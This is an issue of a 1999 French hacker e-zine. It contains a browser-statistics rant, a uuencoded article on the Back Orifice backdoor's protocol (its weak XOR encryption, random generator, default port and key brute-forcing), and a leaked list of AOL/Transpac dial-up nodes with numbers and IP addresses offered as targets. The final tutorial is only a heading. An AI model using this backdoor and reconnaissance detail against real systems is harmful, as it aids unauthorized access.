            22.04.99              - H@CKOFF No13 - * bAd LuCk * - 

  
¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø
   
             _/    _/    _/_/      _/_/_/  _/    _/    _/_/    _/_/_/_/ _/_/_/_/      
            _/    _/  _/    _/  _/        _/  _/    _/    _/  _/       _/
           _/_/_/_/  _/_/_/_/  _/        _/_/      _/    _/  _/_/_/   _/_/_/
          _/    _/  _/    _/  _/        _/  _/    _/    _/  _/        /
         _/    _/  _/    _/    _/_/_/  _/    _/    _/_/    _/       _/   
 
;¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø;

   
    _________________________________________________________________________
   /                                                                         \
  /   Bienvenue dans ce Hackoff No 14 Winsuck edition. (sous le signe de la   |
 / savate evidemment). Au sommaire de ce numero 14 on vous propose le suite  /
| du protocole BO, IE vs Netscape, l'irc vu par Blured, des infos AOL qui   /
 \ feront trembler FT et occuperont pas mal de vos soirees d'ete....       /
  \_______________________________________  ______________________________/
                                          \ |
                                           \|   
                                           ___________                             
                                       .,:;> mAdE By <;:,.                         
                                          /           \           
                                         /  ...Silk..  \
________________________________________/  ...Tobozo..  \______________________________________
¢£¤¥ ¦§¨©ª«¬-®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦/  ....Yopyop...  \§¨©ª«¬-®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§-*`
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯/  .......NK......  \¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
                  		     /  .....blured75....  \
                                    /  .......MistO.......  \
                     --------8<----+-----8<---------8<-------\---8<--+-------8<---        
                                  /____________....___________\
                                                             

                   ______________________________________________________________ 
 __________       /   TabLe des mAtières :                                       \
/ HACK0ff  \     |¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
]-=v0L 14=-[     |     [1]Netscape VS IE                      Tobozo              |
\>juin 99< /     |     [2]BO protocol deuxieme partie         Yopyop & Flaviovs   |
 ¯¯¯¯¯¯¯¯¯¯      |     [3]Les nodes d'AOL/Transpac            Freak Brothers      |
                 |     [4]Jargon File (traduction)            Yopyop              |
                 |     [5]IRC hack tutorial                   Blured75            |
                 |                                                                |
---------8<------+--------------8<---------------------8<---------------------8<--------------
                 ¦
                 : 
                 . 




                          _        _______________________        _
                           `^°*;:,.> Ð ï $ © £ Å ï M Ê ® <.,:;*°^`
__________________________________/¯¯¯¯¯¯¯By Tobozo¯¯¯¯¯¯¯\___________________________________

Tout mensonge cache une verite et toute verite cache un mensonge, apres la pluie le beau
temps et en avril ne te decouvre pas d'un fil car tant va la cruche a l'eau qu'a la fin elle
se fait la malle appris ne profite jamais deux sans trois. 
Conclusion y faut pas attendre que les poules aient des dents pour savoir qu'un tiens averti 
en vaut mieux que deux tu l'auras. 

                   _        _______________________________________        _
                    `^°*;:,.>  Netscape contre Internet Explorer  <.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________


Avant d'ouvrir une polemique, on se doit de montrer quelques statistiques qui, 
j'en suis sur , vont surprendre pas mal d'utilisateurs. Ces statistiques sont 
basees sur des chiffres regroupant 40.000 visiteurs et 7 sites differents sur 
des periodes variables.
Les 7 differents sites traitent respectivement des sujets suivants : 
Windows 98, 95, 3xx et NT, Unix, linux et autres X11, Macintosh, AmigaOS, 
Atari et autres systemes confondus. 
Les sites en question sont tous montes sur serveur Apache (choix arbitraire 
mais fiable) et les statistiques sont obtenues grace a des logiciels differents 
(ce qui peut legerement fausser les resultats). 
Ces infos ne sont pas a prendre pour argent comptant et sont a la base de ma 
reflexion. Les opinions refletees dans ce texte ne sont pas les notres mais un
mixage d'opinions generales recueillies dans des forums et sur des courriers de
webmasters.

*- Sur 40.000 visiteurs classes par systeme d'exploitation :

46.4% sont sur Windoze 98
40.9% sont sur Windoze 95
07.4% sont sur Windoze NT
02.2& sont sur Windoze 3.x
01.3% sont sur Unix X11
01.1% sont sur Mac 
00.3% c'est les autres

Une premiere reflexion se declenche en lisant ces stats et plusieurs 
questions remontent a la surface du chaos de mon esprit : 
* les connaissances en informatique d'un utilisateur sont elles inversement 
  proportionnelles a la popularite de l'OS installé? 
* la tolerance d'erreur d'un meme utilisateur depend-elle de son materiel ou
  de son ignorance?
* Jusqu'ou iront ils ?

Restant sans reponse a ces questions, et par manque d'informations, je me suis
demande quels etaient les navigateurs utilises par ces 100% et voici le resultat :

*- Sur 40.000 Visiteurs classes par outil de navigation : 

53.6% utilisent IE 4.x
35.0% utilisent Netscape 4.x
04.0% utilisent Netscape 3.x
03.7% utilisent IE 3.x
02.2% utilisent IE 5
00.8% utilisent Opera
00.2% utilisent Netscape 2
00.1% c'est les autres

La encore mon sang ne fait qu'un tour et je me demande comment se fesse que c'est
toujours IE qui est en tete des OS et des Browsers. Et la...O revelation, je 
realise que billou a peuplé 90% des ordinateur de la planete avec ses OS et que
sur les 90%, on en au moins 80% qui n'ont choisi ni l'OS, ni le Browser.
Sur ces 80%, 20% seulement vont surfer sur le web. On a donc 20% des plus 
representatifs des utilisateurs qui viennent gonfler les stats en faveur de
microdaube. Mais qu'importe car les stats affichees ici sont proportionnelles
et meme avec 20% en moins c'est toujours IE qui est en tete devant Netscape.
Bon c'est degueulasse, c'est billou qui est en train de gagner la guerre contre
netscape. C'est pas juste, son OS est boggue et son browser on n'en parle meme
pas. La securite est plus un concept qu'une realite et si on parle de privacy, 
il faut se lever tot. 
Mais regardons Netscape de plus pres : l'interpreteur HTML est d'une complexite sans
pareil et nous fait ses caprices, le deboggueur fonctionne mal, le programme met
longtemps a demarrer et pompe toute la memoire, et si un utilisateur mal averti
installe ca sur son systeme windaube, il va tout ravager. 
Dans leur guerre stupide et dont les seules victimes sont nous-meme, ils en sont
arrivés a une politique d'intoxication qui a pour effets :

a- tout le monde dit du mal de Microsoft mais presque tout le monde l'utilise.
b- netscape clame tellement son independance que le navigateur s'isole tout seul
   sur des systemes auxquels il a beaucoup de mal a s'adapter (a part linux evidemment).
c- tout le monde dit du mal de tout le monde (moi y compris)
 
Apres tout ca on peut vous dire la verite :
Dans l'ensemble IE est plus stable que Netscape car quand on fait beaucoup 
d'erreurs, on les gere plus facilement (dixit Nixon). 
Ceux qui disent du mal, soit de l'un, soit de l'autre, feraient mieux de la 
fermer et de se mettre a opera ou a arachne (comme ca ils sentiront vite 
pourquoi netscape et IE ont tout le marche). 



                   _        _______________________________________        _
                    `^°*;:,.>Le Protocole Back-orifice (2e partie)<.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________

Blablabla avec ton encodeur tu encoderas et avec ton decodeur tu decoderas..

_=_ 
_=_ Part 001 of 001 of file bo2.htm
_=_ 

begin 666 bo2.htm
M/$A434P^#0H\2$5!1#X-"CQ4251,13Y,92!0<F]T;V-O;&4@9&4@0F%C:R!/
M<FEF:6-E("A"3RD\+U1)5$Q%/@T*/$U%5$$@3D%-13TB1V5N97)A=&]R(B!#
M3TY414Y4/2).;W1E4&%D(CX-"CQM971A(&YA;64](D1E<V-R:7!T:6]N(B!C
M;VYT96YT/2)"86-K($]R:69I8V4@4')O=&]C;VPB/@T*/&UE=&$@;F%M93TB
M2V5Y=V]R9',B(&-O;G1E;G0](D)/+"!"86-K($]R:69I8V4L(%!R;W1O8V]L
M+"!!='1A<75E<RP@=')O:F%N+"!C:&5V86P@9&4@=')O:64L('9U;F5R86)I
M;&ET92P@:6YT97)N970L($-$0RP@>6]P>6]P+"!T;V)O>F\L('-E<FEA;"!S
M879A=&4@<WES=&5M(CX-"CPO2$5!1#X-"CQ"3T19/@T*/$@Q/DQE(%!R;W1O
M8V]L92!D92!"86-K($]R:69I8V4@*%-U:71E*3PO2#$^#0H\8V5N=&5R/@T*
M/'1A8FQE('=I9'1H/2(Y,"4B/CQ44CX\5$0^/&9O;G0@<VEZ93TB+3$B/@T*
M/'`@86QI9VX](FQE9G0B/@T*/$(^#0I4<F%D=6-T:6]N(&5T(&UO9&EF:6-A
M=&EO;G,\0E(^<&%R(#QA(&AR968](FUA:6QT;SIY;W!Y;W!`96%R=&AL:6YG
M+FYE="(^66]P>6]P/"]A/B!E="`\82!H<F5F/2)M86EL=&\Z=&]B;WIO0&)I
M;W-Y<RYN970B/E1O8F]Z;SPO83X\0E(^,C(O,#0O.3D\+V(^/"]F;VYT/@T*
M/"]T1#X\=&0^#0H\<"!A;&EG;CTB<FEG:'0B/CQF;VYT('-I>F4](BTQ(CX-
M"CQ"/D1O8W5M96YT(&]R:6=I;F%L(&9A:70@<&%R/$)2/@T*/$$@2%)%1CTB
M;6%I;'1O.F9L879I;W9S0&-E;G1R;VEN+F-O;2YB<B(^9FQA=FEO=G-`8V5N
M=')O:6XN8V]M+F)R/"]!/CPO0CX\+V9O;G0^#0H\+W1$/CPO='(^/"]T86)L
M93X-"CPO8V5N=&52/@T*/$@R/D-20SPO2#(^07!R97,@;&$@>F]N92!D92!D
M;VYN965S+"!I;"!Y(&$@=6X@8VAA;7`@9"=U;B!O8W1E="!C;VYT96YA;G0@
M;&4@0U)#(&1U('!A<75E="X@3&4@<V5R=F5U<B!"3R!A(&PG86ER(&0G:6=N
M;W)E<B!L82!V86QE=7(@9&4@8V5T(&]C=&5T+@T*#0H\2#(^0W)Y<'1O9W)A
M<&AI93PO2#(^5&]U<R!L97,@<&%Q=65T<R!"3R!S;VYT(&5N8W)Y<'3I<RX@
M3&$@=&]T86QI=.D@9'4@<&%Q=65T("AY(&-O;7!R:7,@;"=E;BUT971E*2!E
M<W0@96YC<GEP=.EE+@T*3&4@<WES=&5M92!D92!C<GEP=&%G92!E<W0@<VEM
M<&QE+"!E="!DZ7!E;F0@9"=U;F4@8VQE9B!S96-R971E(&-O;FYU92!D97,@
M9&5U>"!P87)T:65S+B!,92!M;W0@9&4@<&%S<V4@97-T('5T:6QI<V4@=6YI
M<75E;65N="!P;W5R(&5N8W)Y<'1E<B!L97,@<&%Q=65T<RP@:6P@;B=E<W0@
M:F%M86ES(&5N=F]Y92!S=7(@;&4@<NES96%U+@T*/%`^3"=E;F-R>7!T:6]N
M(&5S="!F86ET92!P87(@;"=A<'!L:6-A=&EO;B!D)W5N(%A/4B!E;G1R92!C
M:&%Q=64@;V-T971S(&1U('!A<75E="!E="!L82!V86QE=7(@<^EQ=65N=&EE
M;&QE(')E;G9O>>EE('!A<B!U;B!GZ6[I<F%T975R(&1E(&YO;6)R97,@86SI
M871O:7)E<RX@3&4@9^ENZ7)A=&5U<B!E<W0@:6YI=&EA;&ESZ2!A=F5C('5N
M92!V86QE=7(@<75I(&3I<&5N9"!D=2!M;W0@9&4@<&%S<V4@=71I;&ESZ2!P
M;W5R(&QA(&-O;6UU;FEC871I;VXN($1E(&-E='1E(&UA;FEE<F4L(&5N(&%Y
M86YT(&QE(&UE;64@;6]T(&1E('!A<W-E+"!L97,@9^ENZ7)A=&5U<B`@*&QE
M('-E<G9E=7(@970@;&4@8VQI96YT*2!S97)O;G0@:6YI=&EA;&ESZ7,@879E
M8R!L82!M96UE(')A8VEN92P@970@:6QS(')E=&]U<FYE<F]N="!L82!M96UE
M('/I<75E;F-E(&1E(&YO;6)R97,@86SI871O:7)E<R!Q=6D@<V5R82!U=&EL
M:7/I92!P;W5R(&PG96YC<GEP=&EO;B]DZ6-R>7!T:6]N(&1U('!A<75E="X@
M+@T*#0H\4#Y,92!S>7-T96UE(&1E(&-R>7!T86=E(&XG97-T('!A<R!D97,@
M<&QU<R!R;V)U<W1E<RX@0V]M;64@=&]U<R!L97,@<&%Q=65T<R!S;VYT(&5N
M8W)Y<'3I<RP@970@<74G:6QS(&-O;G1I96YN96YT('1O=6IO=7)S(&QA(&UE
M;64@<V5Q=65N8V4@9&4@8V%R871E<F5S("A-04=)0RD@9&%N<R!L)V5N+71E
M=&4L(&EL(&5S="!A;&]R<R!P;W-S:6)L92!D)V]B=&5N:7(@;&$@<^EQ=65N
M8V4@:6YI=&EA;&4@9&4@;F]M8G)E<R!A;.EA=&]I<F5S(&?I;NERZ7,@970@
M86QO<G,@=71I;&ES97(@=6X@8G)U=&4M9F]R8V4@8W)A8VME<B!P;W5R(&3I
M8V]U=G)I<B!L82!R86-I;F4@9'4@9^ENZ7)A=&5U<B!D92!N;VUB<F5S(&%L
MZ6%T;VER97,N#0H-"CQ(,SY,92!GZ6[I<F%T975R(&1E(&YO;6)R97,@86QE
M871O:7)E<SPO2#,^#0I,92!0<F]T;V-O;&4@0D\@=71I;&ES92!L82!F;VYC
M=&EO;B!D92!GZ6[I<F%T:6]N(&1E(&YO;6)R97,@86SI871O:7)E<R!S=6EV
M86YT93H@#0H\0DQ/0TM154]413X-"CQ#3T1%/@T*0D]204Y$*'@I(#T@*'@@
M*B`R,30P,3,I("L@,C4S,3`Q,0T*/"]#3T1%/@T*/"]"3$]#2U%53U1%/@T*
M#0H\4#Y,82!V86QE=7(@:6YI=&EA;&4@9'4@<&%R86UE=')E("TM(&QA(')A
M8VEN92`M+2!E<W0@9&5R:7;I92!D=2!M;W0@9&4@<&%S<V4@=71I;&ESZ2!P
M;W5R(&QE<R!C;VUM=6YI8V%T:6]N<RX-"DQA('-E8V]N9&4@=F%L975R(&5S
M="!T;W5J;W5R<R!L92!RZ7-U;'1A="!O8G1E;G4@9W)A8V4@82!L82!V86QE
M=7(@<'+I8^ED96YT92X@4&%R(&5X96UP;&4L('5N92!SZ7%U96YC92!D92!N
M;VUB<F5S("9Q=6]T.V%L96%T;VER97,F<75O=#L@/$-/1$4^6#Q354(^,3PO
M4U5"/BP@6#Q354(^,CPO4U5"/BP@+BXN+"!8/%-50CYN/"]354(^/"]#3T1%
M/B!P975T(&5T<F4@;V)T96YU92!D92!L82!M86YI97)E('-U:79A;G1E.@T*
M/$),3T-+455/5$4^/%!213Y8/%-50CXQ/"]354(^(#T@0D]204Y$*$E6*0T*
M6#Q354(^,CPO4U5"/B`]($)/4D%.1"A8/%-50CXQ/"]354(^*0T*6#Q354(^
M,SPO4U5"/B`]($)/4D%.1"A8/%-50CXR/"]354(^*0T*("`@("XN+@T*6#Q3
M54(^;CPO4U5"/B`]($)/4D%.1"A8/%-50CYN("T@,3PO4U5"/BD-"CPO4%)%
M/@T*/"]"3$]#2U%53U1%/@T*/%`^3W4@/$-/1$4^258\+T-/1$4^(&5S="!L
M82!R86-I;F4L(&5T(#Q#3T1%/E@\4U5"/FX\+U-50CX\+T-/1$4^(&5S="!L
M92`-"CQ)/FX\4U50/FEE;64\+U-54#X\+TD^(&YO;6)R92!A;.EA=&]I<F4N
M(`T*#0H\2#,^3&$@<F%C:6YE/"](,SX-"DQA(&=R86EN92!U=&EL:7/I92!P
M87(@;&4@9^ENZ7)A=&5U<B!D92!N;VUB<F5S(&%LZ6%T;VER97,@97-T(&?I
M;NERZ64@9W)A8V4@874@;6]T(&1E('!A<W-E('5T:6QI<^D@<&]U<B!L97,@
M8V]M;75N:6-A=&EO;G,N#0I3:2!A=6-U;B!M;W0@9&4@<&%S<V4@;B=E<W0@
M=71I;&ESZ2!C)V5S="!L92!P;W)T(#,Q,S,W('%U:2!S97)A('5T:6QI<^D@
M*&,G97-T(&%U<W-I(&QE(&YU;>ER;R!D=2!P;W)T('5T:6QI<^D@<&%R(&3I
M9F%U="!P87(@0D\I+B!3:6YO;B!L)V%L9V]R:71H;64@<W5I=F%N="!F;W5R
M;FET(&QA(')A8VEN92!A('!A<G1I<B!D=2!M;W0@9&4@<&%S<V4@/$-/1$4^
M4SPO0T]$13XZ(`T*/$),3T-+455/5$4^/%!213Y8(#T@,`T*62`](&QE;F=T
M:"`H;F]M8G)E(&1E(&-A<F%T97)E<RD@;V8@4PT*6B`](#`-"E=(24Q%(%@@
M)FQT.R!9#0H)6B`](%H@*R!36UA=#0H)6"`](%@@*R`Q#0I%3D0-"@T*6"`]
M(#`-"E=(24Q%(%@@)FQT.R!9#0H)248@6"!I<R!O9&0-"@D)6B`](%H@+2`H
M4UM872`J("A9("T@6"`K(#$I*0T*"45,4T4-"@D)6B`](%H@*R`H4UM872`J
M("A9("T@6"`K(#$I*0T*"45.1`T*"5H@/2!:("4@,'@W9F9F9F9F9@T*"5@@
M/2!8("L@,0T*14Y$#0I:(#T@*%H@*B!9*2`E(#!X-V9F9F9F9F8-"DE6(#T@
M6@T*/"]04D4^#0H\+T),3T-+455/5$4^#0I/=2`F<75O=#L\0T]$13Y36VY=
M/"]#3T1%/B9Q=6]T.R!E<W0@;&4@/$D^;CQ355`^:65M93PO4U50/CPO23X@
M#0IC87)A8W1E<F4@9'4@;6]T(&1E('!A<W-E+"`F<75O=#L\0T]$13Y!("4@
M0CPO0T]$13XF<75O=#L@;&4@<F5L:7%U870@9&4@;&$@9&EV:7-I;VX@9&4@
M02!P87(@0BP@970@)G%U;W0[/$-/1$4^258\+T-/1$4^)G%U;W0[(&QA(&=R
M86EN92!Q=64@;F]U<R!R96-H97)C:&]N<RX@#0H\4#Y.;W1E.B!,92!GZ6[I
M<F%T975R(&1E(&YO;6)R97,@86SI871O:7)E<R!E<W0@:6YI=&EA;&ESZ2!A
M=F5C(&QA(&=R86EN92!P;W5R(&-H87%U92!P87%U970@<F5C=2!O=2!E;G9O
M>>DN#0H\4#Y.;W1E.B!,97,@=F%R:6%B;&5S(#Q#3T1%/E@\+T-/1$4^+"`\
M0T]$13Y9/"]#3T1%/B!E="`\0T]$13Y:/"]#3T1%/B!S;VYT('1O=71E<R!D
M97,@;F]M8G)E<R!E;G1I97)S(&1E(#,R(&)I="X@#0H-"CQ(,CY%;F-R>7!T
M:6]N+V3I8W)Y<'1I;VX\+T@R/@T*3"=A;&=O<FET:&UE('-U:79A;G0@97-T
M(&QA(&1E;6]N<W1R871I;VX@9&4@8V]M;65N="!U;B!P87%U970@0D\@<&5U
M="!E=')E(&5N8W)Y<'3I(&5T(&1E8W)Y<'3I.@T*/$),3T-+455/5$4^#0H\
M4%)%/@T*3"`]($QO;F=U975R(&1U('!A<75E="!"3PT*6"`](#`-"EH@/2!)
M5@T*5TA)3$4@6"`F;'0[($P-"@E:(#T@0D]204Y$*%HI#0H@"5!;6%T@/2!0
M6UA=(%X@*"A:("9G=#LF9W0[(#$V*2`F86UP.R`P>&9F*0T*"5@@/2!8("L@
M,0T*14Y$#0H\+U!213X-"CPO0DQ/0TM154]413X-"D]U("9Q=6]T.SQ#3T1%
M/E!;;ET\+T-/1$4^)G%U;W0[(&EN9&EQ=64@;&4@/$D^;CQ355`^96UE/"]3
M55`^/"])/B`-"F]C=&5T(&1U('!A<75E="PH/S\@)G%U;W0[/$-/1$4^02!>
M($(\+T-/1$4^)G%U;W0[(&QA(')E<&%R=&ET:6]N(#Q%33X@6$]2(#PO14T^
M(&]P97)A;G0@#0IE;G1R92!!(&5T($(L("9Q=6]T.SQ#3T1%/D$@)F=T.R9G
M=#L@0CPO0T]$13XF<75O=#L@;&4@9&5C86QA9V4@<&%R(#,R(&)I="!D92!!
M('-U<B!"(&)I=',@=F5R<R!L82!D<F]I=&4L(&5T("9Q=6]T.SQ#3T1%/D$@
M)F%M<#L@0CPO0T]$13XF<75O=#L@;&$@<F5P87)T:71I;VX@150@;"=O<&5R
M871I;VX@96YT<F4@02!E="!"+B`_/RD-"B`-"CQ(,CY4<F%N<V9E<B!D92!F
M:6-H:65R<R!P87(@5$-0/"](,CX-"DQE('1R86YS9F5R<R!D97,@9FEC:&EE
M<G,@<&%R(&PG=71I;&ES871I;VX@9&4@5$-0("AO<&5R871I;VYS(`T*5%E0
M15]40U!&24Q%4T5.1"!E="!465!%7U1#4$9)3$5214-)5D5$*2!E<W0@9F%I
M="!P87(@;&4@<V5R=F5U<B!G<F%C92!A(&PG;W5V97)T=7)E(&1U('!O<G0@
M9&5F:6YI(&1A;G,@;&5S('!A<F%M971R97,@9&4@;&$@8V]M;6%N9&4@*'!A
M<B!DZ69A=70@;&4@<&]R="!E<W0@;&4@,S$S,S<I+B`-"CQ0/E%U86YD(&QE
M(&-L:65N="!E;G9O:64@=6X@<&%Q=65T(%194$5?5$-01DE,15-%3D0L(&QE
M('-E<G9E=7(@;W5V<F4@;&4@9FEC:&EE<B!S<&5C:69IZ2!E="!C;VUM96YC
M92!L)^EC;W5T92!D)W5N92!C;VYN96-T:6]N('-U<B!L92!P;W)T('-PZ6-I
M9FEQ=64N($5N<W5I=&4L(&QE(&-L:65N="!C;VUM96YC92!A(&5N=F]Y97(@
M;&4@9FEC:&EE<BX-"@T*/%`^475A;F0@;&4@8VQI96YT(&3I<VER92!R96-E
M=F]I<B!U;B!F:6-H:65R+"!I;"!E;G9O:64@=6X@<&%Q=65T(%194$5?5$-0
M1DE,15)%0T5)5D4@96X@<W#I8VEF:6%N="!L92!N;VT@9'4@9FEC:&EE<B!E
M="!L92!P;W)T('-U<B!L97%U96P@:6P@<V]U:&%I=&4@;&4@<F5C979O:7(N
M($QE('-E<G9E=7(@96YS=6ET92!O=79R92!L92!P;W)T(&5T(&-O;6UE;F-E
M(&$@96YV;WEE<B!L92!F:6-H:65R(&1E<R!Q=64@;&4@8VQI96YT(&5S="!P
M<F5T(&$@;&4@<F5C979O:7(N#0H\4#Y,82!T<F%M92!40U`@;B=E<W0@<&%S
M(&5N8W)Y<'3I92X-"CQ(,CY2969E<F5N8V5S/"](,CX-"CQ53#X-"B`@/$Q)
M/CQ!(&AR968](FAT='`Z+R]W=W<N8W5L=&1E861C;W<N8V]M+W1O;VQS+R(^
M0D\@8VQI96YT('!O=7(@56YI>#PO03X@#0H@(#Q,23X\02!H<F5F/2)H='1P
M.B\O=W=W+FES<RYN970O>&9O<F-E+V%L97)T<R]A9'9I<V4U+FAT;6PB/DE3
M4R!A;&5R=&5S('/I8W5R:73I("A8+49/4D-%*2`M+2`F<75O=#M#=6QT(&]F
M('1H92!$96%D($-O=R!"86-K($]R:69I8V4@0F%C:V1O;W(F<75O=#L\+T$^
M(`T*/"],23X\+U5,/@T*/$@R/D1O8W5M96YT(&]R:6=I;F%L/"](,CX-"CQ5
M3#X-"CQ!($A2148](FAT='`Z+R]W=W<N86)B+F%H82YR=2]S;V9T=V%R92]N
M8G1S8V%N+FAT;6PB/DY"5%-C86X\+T$^('!A<B!!;&QA($)E>G)O=71C:&MO
M+"!3;W9L:6YK($Q,0RP@4WES=&5M<R`@061M:6YI<W1R871O<BP@36]S8V]W
M+"!2=7-S:6$-"CPO3$D^/"]53#X-"CQ"4CX-"CQ"4CX-"@T*#0H-"CPO0D]$
-63X-"CPO2%1-3#X-"@``
`
end



                   _        _______________________________________        _
                    `^°*;:,.> AOL sucks  (mais ca on savait deja) <.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________

*-Carnet de bord du capitaine, coefficient espace temps indéfini-*
------------------------------------------------------------------
Bon il fallait reagir, AOL a copieusement diffusé avec
l'accord du CNIL les adresses de ses abonnés a des fins
anti-piratage, il fallait que ceux qu'on fait passer pour
des pirates diffusent a leur tour des infos sur AOL (et
sans l'accord du CNIL non mais !!). En prime, et comme
personne n'aime france telecom, il se trouve que l'agence
francaise de monopole telephonique partage aussi la 
confidentialité de ce contenu (ouille). Voici une breve
Foire Aux Questions et les infos a l'etat brut. Si vous
sentez que vous pouvez rajouter quelque chose, ne vous
genez pas a condition de laisser cette intro et les 
greetings qui s'imposent. N'oubliez pas de signer et dater
vos ajouts ainsi que les eventuels resultats.
------------------------------------------------------------------
FAQ :
-Les nodes AOL-Transpac, c'est du pipeau ou quoi ?
-Meuuuh non.. en tous cas d'apres les verifications effectuees 
par notre cher traceur online, c'est bien du reel.
-Ca sert a quoi de savoir les nodes d'AOL ?
-Si tu te poses la question, ferme tout de suite le document 
et retourne jouer avec winnuke sur #warez.
-C'est quoi le rapport entre AOL et transpac ?
-Un rapport incontournable d'interet reciproque : comme AOL
fonctionne avec une politique americaine, ils minimisent les
investissements en externalisant la moitie de leurs services
sur des societes de services (de toutes facons en france ils
n'ont pas le choix, car FT monopolise et les utilisateurs 
basiques ne sont pas assez consommateurs pour financer un 
reseau cablé propriétaire). En clair TOUS les acces AOL sont
en réalité des acces via Transpac (a peu d'exceptions pres).
-Pourquoi tous les traceroute passent par bagnolet ?
-C'est le point de convergence de leurs reseaux, ce qui justifie
le fait que pas mal d'abonnes ont des problemes a surfer en france.
En effet, la plupart des requetes d'acces passent par le proxy
situé aux usa. Bravo AOL, merci FT.
-Mais AOL c'est pas du PPP ?
-Exact, c'est un dérivé du SLIP avec quelques modifs specialement
négociées pour éviter qu'on se rende compte a quel point la 
sécurité est absente. Compuserve par contre utilise toujours la
méthode du basculement 7bits/8bits pour envoyer le mot de passe.
La plupart des points cités ci-dessous datent d'avant le rachat
donc ne vous attendez pas a des lueurs. Le passage d'AOL en
numéro national a certainement invalidé quelques uns de ceux ci
mais les ip sont toujours valides, ce qui donne quand meme matiere
a travailler. 
------------------------------------------------------------------

Dedies AOL:
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
* Site	                    * Numero T2       * Nom_Max   * @IP Max         *
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
* Aubervilliers AOL         * 01 48 11 47 80  * MSAAUB03  * 194.250.214.15  *
* Aubervilliers AOL         * 01 48 11 47 80  * MSAAUB04  * 194.250.214.45  *
* Aubervilliers AOL         * 01 48 11 47 80  * MSAAUB07  * 194.250.214.23  *
* Beaujon AOL               * 01 53 93 87 05  * MSABJN03  * 194.250.214.197 *
* Beaujon AOL               * 01 53 93 87 05  * MSABJN04  * 194.250.214.213 *
* Beaujon AOL               * 01 53 93 87 05  * MSABJN07  * 194.250.214.211 *
* Cergy AOL                 * 01 30 32 06 44  * MSACGY03  * 194.250.214.55  *
* Cergy AOL                 * 01 30 32 06 44  * MSACGY04  * 194.250.214.24  *
* Corbeil AOL               * 01 60 89 85 50  * MSACOR04  * 194.250.214.22  *
* Corbeil AOL               * 01 60 89 85 50  * MSACOR05  * 194.250.214.53  *
* Guyancourt AOL            * 01 39 44 73 87  * MSAGUY04  * 194.250.214.51  *
* Guyancourt AOL            * 01 39 44 73 87  * MSAGUY05  * 194.250.214.21  *
* Guyancourt AOL            * 01 39 44 73 87  * MSAGUY06  * 195.6.71.6      *
* Lyon AOL                  * 04 72 13 30 18  * MSALYO04  * 194.250.214.61  *
* Lyon AOL                  * 04 72 13 30 18  * MSALYO05  * 194.250.214.30  *
* Marseille AOL             * 04 91 28 05 00  * MSAMAR04  * 194.250.214.62  *
* Marseille AOL             * 04 91 28 05 00  * MSAMAR05  * 195.6.71.3      *
* Raspail AOL               * 01 40 64 16 70  * MSARAS01  * 194.250.214.243 *
* Raspail AOL               * 01 40 64 16 70  * MSARAS02  * 194.250.214.244 *
* Raspail AOL               * 01 40 64 16 70  * MSARAS03  * 194.250.214.245 *
* Raspail AOL               * 01 40 64 16 70  * MSARAS04  * 194.250.214.254 *
* Raspail AOL               * 01 40 64 16 70  * MSARAS05  * 194.250.214.253 *
* Raspail AOL               * 01 40 64 16 70  * MSARAS010 * 194.250.214.250 *
* Raspail AOL               * 01 40 64 16 70  * MSARAS011 * 194.250.214.249 *
* Raspail AOL K56Flex       * 01 40 64 09 66  * MSARAS016 * 194.250.214.251 *
* Lille USR AOL             * 03 20 19 10 05  * USQLIL08  * 195.101.148.1   *
* Lyon USR AOL              * 04 72 68 70 20  * USALYO10  * 195.101.148.9   *
* Marseille USR AOL         * 04 72 68 70 20  * USAMAR08  * 195.101.148.17  *
* Raspail USR AOL           * 01 53 91 07 20  * USARAS01  * 195.250.214.227 *
* Toulouse Camichel USR AOL * 05 62 73 79 58  * USATLS10  * 195.101.148.25  *
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
*-*-*-*-*-*-*-*-Et le meilleur pour la fin : un acces PPP !!!-*-*-*-*-*-*-*-*
* Raspail AOL PPP           * 01 40 64 16 70  * MSARAS017 * 194.250.214.252 *
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

Document realisé, négocié, rédigé et finalisé par les Phreak-Brothers
Phineas-fuck, Freakwheelin'Franklin, Faq-Freddy #08-06-99


                   _        _______________________________________        _
                    `^°*;:,.>         IRC Hack Tutorial           <.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________

